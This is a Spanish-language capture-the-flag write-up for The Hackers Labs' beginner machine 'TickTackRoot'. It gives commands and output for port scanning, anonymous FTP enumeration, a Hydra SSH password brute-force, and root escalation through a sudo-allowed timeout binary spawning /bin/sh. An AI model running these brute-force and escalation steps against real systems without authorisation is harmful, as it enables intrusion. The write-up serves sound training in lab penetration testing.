CTF THE HACKERS LABS: TICKTACKROOT



INTRODUCCIÓN

Hoy exploraremos una máquina de dificultad principiante disponible en la página <u>The Hackers Labs</u>, la máquina llamada <u>TickTackRoot</u>

En este caso se trata de una máquina basada en el Sistema Operativo Linux, la cual, para poder rootear el sistema, primero realizaremos enumeración de puertos y rutas sobre un servidor web y l Explotaremos la vulnerabilidad FTP Anonymous login y realizaremos fuerza bruta Hydra al servicio SSH, por último, escalaremos privilegios aprovechando el binario timeout suid.

AUTOR: Eduard Bantulà (aka. WireSeed).

1) Escaneo de red.

Como de costumbre comenzamos utilizando NMAP, ya que estamos en la red NAT utilizando VirtualBox y la IP víctima, nos la entrega la misma máquina cuando ha arrancado.



Realizaremos el NMAP con los parámetros siguientes:

- -p-: Escaneo de todos los puertos. (65535)
- -sS: Realiza un TCP SYN Scan para escanear de manera rápida que puertos están abiertos.
- -sC: Realiz una escaneo con los scripts básicos de reconocimiento
- -sV: Realiza un escaneo en búsqueda de los servicios
- -min-rate 5000: Especificamos que el escaneo de puertos no vaya más lento que 5000 paquetes por segundo, el parámetro anterior y este hacen que el escaneo se demore menos.
- -n: No realiza resolución de DNS, evitamos que el escaneo dure más tiempo del
- -Pn: Deshabilitamos el descubrimiento de host mediante ping.
- -oG: Para guardar en un archivo el resultado del escaneo.
- -v: Para aplicar verbouse a la salida de información.

```
(root@Wire-Kali)-[/home/wireseed/Escritorio/TheHackersLabs/ticktackroot]
mnap -p- -sSCV -Pn -n --min-rate 5000 10.0.73.11 -oG ports.txt -vvv
```

El cual nos devuelve el resultado de que tiene abiertos el puerto 21 (FTP), 22 (SSH) y 80 (HTTP).

2) Enumeración.

Visualizaremos el web a ver si encontramos información, ya que tenemos el puerto 80 abierto, seguro que tendremos algún web en funcionamiento.



Al explorar el servicio FTP, detectamos que permite el acceso anónimo. Al profundizar en la estructura de directorios, identificamos una carpeta denominada "login". Dentro de esta carpeta, descubrimos lo que parecen ser los datos o perfiles de dos usuarios, lo que podría representar un punto de interés para un análisis más detallado, especialmente si contiene información sensible o relacionada con las credenciales de acceso. Este hallazgo resalta la necesidad de evaluar la configuración de permisos del servicio FTP y garantizar que no se exponga información confidencial de manera inadvertida.

```
root⊗ Wire-Kali)-[/home/wireseed/Escritorio/TheHackersLabs/ticktackroot]

# ftp 10.0.73.11

Connected to 10.0.73.11.

220 Bienvenido Robin

Name (10.0.73.11:wireseed): anonymous

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ■
```

Al lanzar el nmap, cuando se hace el descubrimiento del puerto 21 FTP, se nos indica que el usuario ANONYMOUS, está habilitado.

Encontramos, en el acceso del FTP, un posible usuario **ROBIN**, ya que se nos da la bienvenida con ese usuario.

Al realizar un LS, encontramos un directorio llamado login.

```
ftp> ls

229 Entering Extended Passive Mode (|||26180|)

150 Here comes the directory listing.

-rw-r--r-- 1 0 0 10671 Oct 03 14:31 index.html

drwxr-xr-x 2 0 0 4096 Oct 07 11:18 login

226 Directory send OK.
```

Si accedemos a el, encontraremos un ficher llamado login.txt el cual descargaremos el ficher a nuestra máquina para poder tratarlo. Para eso utilizaremos la instrucción GET

Al procesar el archivo con un CAT, nos devuelve dos nombres, RAFAEL y MONICA, parecen dos posibles usuarios.

```
(root@Wire-Kali)-[/home/wireseed/Escritorio/TheHackersLabs/ticktackroot]
| ls
| login.txt ports.txt
| (root@Wire-Kali)-[/home/wireseed/Escritorio/TheHackersLabs/ticktackroot]
| cat login.txt
| rafael monica
```

3) Explotación.

¿Porque no probamos de hacer una fuerza bruta a los usuarios por SSH? Vamos a probar primero por el que nos ha entregado el mismo FTP cuando hemos accedido a el, ROBIN... Para ello utilizaremos la herramienta HYDRA, con la siguiente sintaxis.

```
(root@ Wire-Kali)-[/home/wireseed/Escritorio/TheHackersLabs/ticktackroot]
# hydra -l robin -P /usr/share/wordlists/rockyou.txt ssh://10.0.73.11
```

hydra: Es la herramienta utilizada para realizar ataques de fuerza bruta en varios servicios, incluido SSH.

-l robin: Especifica el nombre de usuario objetivo, en este caso, robin.

-P /usr/share/wordlists/rockyou.txt: Indica la lista de contraseñas que se probarán. Aquí se usa el famoso diccionario rockyou.txt, ubicado en el sistema.

ssh://10.0.73.11: Define el protocolo (SSH) y la dirección IP del objetivo, en este caso, 10.0.73.11.

Al cabo de un rato, nos entrega una contraseña del usuario **ROBIN**, con la que vamos a probar de acceder por SSH.

USR: robin PWD: babyblue

Vamos a probar si accede por SSH:

```
)-[/home/wireseed/Escritorio/TheHackersLabs/ticktackroot]
    ssh robin@10.0.73.11
The authenticity of host '10.0.73.11 (10.0.73.11)' can't be established.
ED25519 key fingerprint is SHA256:AbcLfoR05xqCMsRNSIrZgMMbg/qvciy2F5kfxTJLfMA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.73.11' (ED25519) to the list of known hosts.
robin@10.0.73.11's password:
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64)
 * Documentation: https://help.ubuntu.com
 * Management:
                  https://landscape.canonical.com
                  https://ubuntu.com/pro
 * Support:
 System information as of dom 26 ene 2025 18:53:47 UTC
  System load: 0.08
                                                          103
                                 Processes:
  Usage of /: 51.4% of 4.93GB Users logged in:
                                                          0
  Memory usage: 9%
                                 IPv4 address for enp0s3: 10.0.73.11
  Swap usage:
 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.
   https://ubuntu.com/engage/secure-kubernetes-at-the-edge
El mantenimiento de seguridad expandido para Applications está desactivado
Se pueden aplicar 3 actualizaciones de forma inmediata.
Para ver estas actualizaciones adicionales, ejecute: apt list --upgradable
Active ESM Apps para recibir futuras actualizaciones de seguridad adicionales.
Vea https://ubuntu.com/esm o ejecute «sudo pro status»
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Oct 15 08:45:45 2024 from 192.168.18.48
robin@TheHackersLabs-Ticktackroot:~$
```

Una vez dentro vamos a por el FLAG de usuario...

```
robin@TheHackersLabs-Ticktackroot:~$ ls
user.txt
robin@TheHackersLabs-Ticktackroot:~$ cat user.txt

5JYN
robin@TheHackersLabs-Ticktackroot:~$
```

Ya lo tenemos!!!

USER_FLAG:	5	JY	'N
-------------------	---	----	----

Vamos a por root ahora.

4) Elevación de privilegios.

Para ello vamos a probar con SUDO -L a ver si tenemos algún binario que podamos executar con los permisos de root.

Tenemos uno llamado TIMEOUT_SUID, vamos a mirar en <u>GTFOBINS</u> a ver si tenemos alguna escalada hecha ya.

Encontramos una, vamos a probarla.

Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

```
sudo timeout --foreground 7d /bin/sh
```

Vamos a proceder pues, así accedemos como ROOT y podemos conseguir la última FLAG que nos falta.

```
robin@TheHackersLabs-Ticktackroot:~$ sudo timeout_suid --foreground 7d /bin/sh
# whoami
root
# ■
```

Hemos accedido comoROOT al sistema, vamos a por la FLAG...

```
# pwd
/home/robin
# cd ../..
# cd root
# ls
root.txt
# cat root.txt
# cat root.txt
```

ROOT_FLAG 7CML

Recordad que no es la única solución que existe a esta máquina, hay muchas maneras de poderla resolver, indagar y encontrad nuevas opciones de resolución de este laboratorio tan fabuloso que nos ha presentado THE HACKERS LABS.

Gracias por vuestra atención.

LABORATORIO: THE HACKERS LABS

AUTOR WRITEUP: Eduard Bantulà (aka. WireSeed).